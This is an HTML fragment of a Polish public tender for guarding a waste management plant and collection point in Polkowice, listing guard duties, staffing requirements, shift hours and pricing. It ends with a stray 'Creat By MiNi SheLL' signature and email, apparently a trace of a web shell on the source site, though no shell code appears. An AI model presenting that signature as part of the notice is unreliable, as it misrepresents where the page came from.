zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-01-02<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena jednostkowa brutto ( 1 rg )</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>1. Zamawiający dopuszcza składanie ofert częściowych na każdą ze wskazanych powyżej części.2. Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia.3. Na podstawie art. 29 ust 3a oraz w związku z art. 36 ust 2 pkt 8a) ustawy Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji przedmiotowego zamówienia: a)	w przypadku składania oferty na część 1 co najmniej 6 osób zdolnych do wykonania zamówienia, w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku pracownika ochrony, wykonujących czynności - związane z ochroną mienia na terenie Zakładu Gospodarki Odpadami ( ul Działkowa 20 ),b)	w przypadku składania oferty na część 2 co najmniej 3 osoby zdolnych do wykonania zamówienia, w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku pracownika ochrony, wykonujących czynności - związane z ochroną mienia na terenie Centralnego Punktu Selektywnej Zbiórki Odpadów (ul. Działkowa 18) w Polkowicach,c)	w przypadku składania oferty łącznie na część 1 i 2, Zamawiający wymaga spełnienia łącznie w/w wymogów tj. wykazania co najmniej 9 osób zdolnych do wykonania zamówienia , w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku pracownika ochrony, wykonujących czynności - związane z ochroną mienia na terenie Zakładu Gospodarki Odpadami ( ul Działkowa 20 ) oraz na terenie Centralnego Punktu Selektywnej Zbiórki Odpadów (ul. Działkowa 18) w Polkowicach, d)	w przypadku składania oferty na część 1 lub 2 odrębnie lub też łącznie (tj. niezależnie od ilości części na które jest składana oferta) co najmniej 4 osoby zdolne do wykonania zamówienia, w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku grupy interwencyjno-patrolowej, wykonujących czynności prewencji (grupy interwencyjnej) mogącej zareagować na terenie chronionych obiektów w czasie do 15 minut od telefonicznego wezwania ,działający 24h na dobę.Zamawiający na czas urlopów oraz usprawiedliwionej nieobecności pracownika ochrony dopuszcza zastępstwo tych osób na podstawie umowy cywilno-prawnej .Sposób dokumentowania zatrudnienia osób, o których mowa w niniejszym punkcie, oraz uprawnienia zamawiającego w zakresie kontroli spełnienia przez wykonawcę wymagań określonych w art. 29 ust. 3a ustawy, oraz sankcji z tytułu niespełnienia tych wymagań, określone zostały w § 6 wzoru umowy, który stanowi integralną część SIWZ.<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Dozór i ochrona mienia na terenie Centralnego Punkt Selektywnej Zbiórki Odpadów w Polkowicach, ul. Działkowa 18, Polkowice</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Specyfikacja do zadania nr 2:Dozór i ochrona mienia na terenie:II.	Wymagania dotyczące dozoru i ochrony mienia na terenie Centralnego Punktu Selektywnej Zbiórki Odpadów, ul. Działkowa 18, Polkowice.1.	Bezwzględne przestrzeganie zakazu przebywania na terenie CPSZOK osób postronnych (szczególnie osób zajmujących się nielegalnym odzyskiem surowców wtórnych).2.	Po zamknięciu CPSZOK-u bezwzględne przestrzeganie zakazu wjazdów pojazdów i przebywania osób postronnych (wyjątek - wyraźna instrukcja Kierownika Zakładu Gospodarki Odpadami, Prezesa Zarządu) lub upoważnienie.3.	Niezwłoczne powiadomienie Kierownika Zakładu Gospodarki Odpadami o każdorazowym wejściu na teren Zakładu organów kontrolujących np. WIOŚ, GIOŚ, Policja, Urząd Marszałkowski.4.	Stałe obchody:- strzeżonych urządzeń- pomieszczeń - obiektu.5.	Kontrola zabezpieczeń i zamknięć wejść (bramy i drzwi) oraz okien.6.	Pracownicy ochrony są zobowiązani znać miejsce rozmieszczenia przyrządów alarmowych, sprzętu gaśniczego, miejsce włączenia/wyłączenia oświetlenia terenu oraz instrukcje p. poż, CPSZOK.7.	Sprawdzanie działania urządzeń sygnalizacyjnych, punktów świetlnych i urządzeń przeciwpożarowych.8.	Załączanie i wyłączanie oświetlenia zewnętrznego.9.	Szczególny nadzór nad stanem pożarowym obiektu. Przestrzeganie bezwzględnego zakazu palenia ognisk. Likwidowanie wszelkich prób palenia ognisk. Natychmiastowe alarmowanie o zarzewiu ognia Straż Pożarną, Kierownika Składowiska, Kierownika Zakładu Oczyszczania Miasta.10.	Zapobieganie wynoszeniu i wywożeniu odzyskanych odpadów.11.	Zatrzymanie osób dokonujących kradzieży, dewastujących mienie lub znajdujących się pod wpływem alkoholu wraz z bezzwłocznym powiadomieniem policji oraz wskazanego pracownika CPSZOK.12.	W przypadku zagrożenia lub uzyskania informacji o realnym zagrożeniu bezpieczeństwa ochranianego obiektu lub mienia w nim znajdującego się, uruchamianie grupy interwencyjnej, która podejmie stosowne działania, bez dodatkowego wynagrodzenia, przy jednoczesnym zgłoszeniu do uprawnionego pracownika Zamawiającego.13.	Stała współpraca z Zamawiającym w zakresie utrzymania ładu i porządku na terenie obiektu i w jego otoczeniu.14.	Zapobieganie wnoszeniu na składowisko odpadów nie ewidencjonowanych.15.	Zatrzymanie osób dokonujących kradzieży, dewastujących mienie lub znajdujących się pod wpływem alkoholu wraz z bezzwłocznym powiadomieniem policji i wskazanego pracownika CPSZOK.16.	W szczególnych warunkach (silne mrozy), nie dopuszczenie do zamarznięcia platformy wagi (posypywanie środkami otrzymanymi od Zamawiającego).17.	Pracownicy ochrony powinni być zaopatrzeni w odpowiedni strój oraz środki techniczne.18.	Zakaz uruchamiania pojazdów i urządzeń (z wyjątkiem sytuacji zagrażających życiu lub mieniu).19.	Prowadzenie codziennych raportów z opisem dyżurów ( np. spostrzeżenia, zdarzenia, lub ich brak, wezwania grupy interwencyjnej itp.)20.	Przedstawienie przez Wykonawcę wykazu pracowników obsługujących obiekt.21.	Wykonawca na etapie przedstawiania ofert powinien dokonać wizji lokalnej na obiekcie celem zapoznania się z istniejącymi warunkami oraz terenem.22.	Zamawiający umożliwia korzystanie z monitoringu na terenie CPSZOK.23.	Zamawiający zastrzega sobie możliwość kontroli przez Wykonawcę pracowników alkomatem oraz kontrolę plecaków, samochodów.24.	W ramach usługi Wykonawca wyposaży osoby dozorujące w urządzenia systemu kontroli obchodów, dzięki którym możliwa będzie pełna kontrola nad wykonywanymi obchodami, tj. dokonywanie obchodów wewnątrz i na zewnątrz dozorowanych obiektów w celu sprawdzenia zabezpieczeń (zamknięcia pomieszczeń, okien, wyłączenie oświetlenia i urządzeń elektrycznych). Ponadto Wykonawca będzie przedstawiał Zamawiającemu raport tygodniowy z dokonywanych obchodów.25.	Wykonawca musi posiadać własny oddział prewencji (grupę interwencyjną) składający się z co najmniej 2 osób poruszający się samochodem i mogący zareagować na terenie chronionych obiektów w czasie do 15 minut od telefonicznego wezwania działający 24h na dobę.26.	W przypadku stwierdzenia niezgodności z zakresem przedmiotu zamówienia będzie tworzony protokół niezgodności.27.	Wykonawca odpowiada wobec Zamawiającego za wszelkie szkody wyrządzone i powstałe w związku z nienależytym wykonywaniem przedmiotu umowy przez pracowników ochrony oraz osoby trzecie.Forma rozliczenia:a) Należność za wykonaną usługę, przysługującą Wykonawcy za każdy miesiąc będzie iloczynem liczby roboczogodzin przepracowanych w danym miesiącu i stawki za 1 roboczogodzinę.b) Cenę do przetargu należy podać za 1 roboczogodzinęWielkość obsady: a) 1 osoba, b) grupa interwencyjna (24 h/dobę, czas dojazdu od momentu zgłoszenia 15 min.).Godziny wykonywania usługi ochroniarskiej CPSZOK:1)	W dni robocze:a)	Poniedziałek - od godz. 19.00 do godz. 11.00 dnia następnego,b)	Wtorek - od godz. 19.00 do godz. 11.00 dnia następnego,c)	Środa - od godz. 19.00 do godz. 11.00 dnia następnego,d)	Czwartek - od godz. 19.00 do godz. 11.00 dnia następnego,e)	Piątek - od godz. 19.00 do godz. 7.00 dnia następnego.2)	Sobota - od godz. 15.00 do godz. 15.00 dnia następnego.3)	Niedziela - 24/dobę 4)	Święta - 24/dobęMiejsce wykonywania usługi: Centralny Punkt Selektywnej Zbiórki Odpadów Komunalnych w Polkowicach, ul. Działkowa 18.Termin wykonywania usługi: od dnia przekazania obiektu (termin zostanie wcześniej ustalony przez strony telefonicznie) do dnia 30.09.2019 r. do godziny 24.00W szczególności ochronie będą podlegać:- środki trwałe, wyposażenie, dokumentacja- maszyny, budynek administracyjny, wiaty<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>79710000-4, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-09-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena jednostkowa brutto ( 1 rg )</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>1. Zamawiający dopuszcza składanie ofert częściowych na każdą ze wskazanych powyżej części.2. Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia.3. Na podstawie art. 29 ust 3a oraz w związku z art. 36 ust 2 pkt 8a) ustawy Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji przedmiotowego zamówienia: a)	w przypadku składania oferty na część 1 co najmniej 6 osób zdolnych do wykonania zamówienia, w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku pracownika ochrony, wykonujących czynności - związane z ochroną mienia na terenie Zakładu Gospodarki Odpadami ( ul Działkowa 20 ),b)	w przypadku składania oferty na część 2 co najmniej 3 osoby zdolnych do wykonania zamówienia, w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku pracownika ochrony, wykonujących czynności - związane z ochroną mienia na terenie Centralnego Punktu Selektywnej Zbiórki Odpadów (ul. Działkowa 18) w Polkowicach,c)	w przypadku składania oferty łącznie na część 1 i 2, Zamawiający wymaga spełnienia łącznie w/w wymogów tj. wykazania co najmniej 9 osób zdolnych do wykonania zamówienia , w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku pracownika ochrony, wykonujących czynności - związane z ochroną mienia na terenie Zakładu Gospodarki Odpadami ( ul Działkowa 20 ) oraz na terenie Centralnego Punktu Selektywnej Zbiórki Odpadów (ul. Działkowa 18) w Polkowicach, d)	w przypadku składania oferty na część 1 lub 2 odrębnie lub też łącznie (tj. niezależnie od ilości części na które jest składana oferta) co najmniej 4 osoby zdolne do wykonania zamówienia, w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku grupy interwencyjno-patrolowej, wykonujących czynności prewencji (grupy interwencyjnej) mogącej zareagować na terenie chronionych obiektów w czasie do 15 minut od telefonicznego wezwania ,działający 24h na dobę.Zamawiający na czas urlopów oraz usprawiedliwionej nieobecności pracownika ochrony dopuszcza zastępstwo tych osób na podstawie umowy cywilno-prawnej .Sposób dokumentowania zatrudnienia osób, o których mowa w niniejszym punkcie, oraz uprawnienia zamawiającego w zakresie kontroli spełnienia przez wykonawcę wymagań określonych w art. 29 ust. 3a ustawy, oraz sankcji z tytułu niespełnienia tych wymagań, określone zostały w § 6 wzoru umowy, który stanowi integralną część SIWZ.<br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com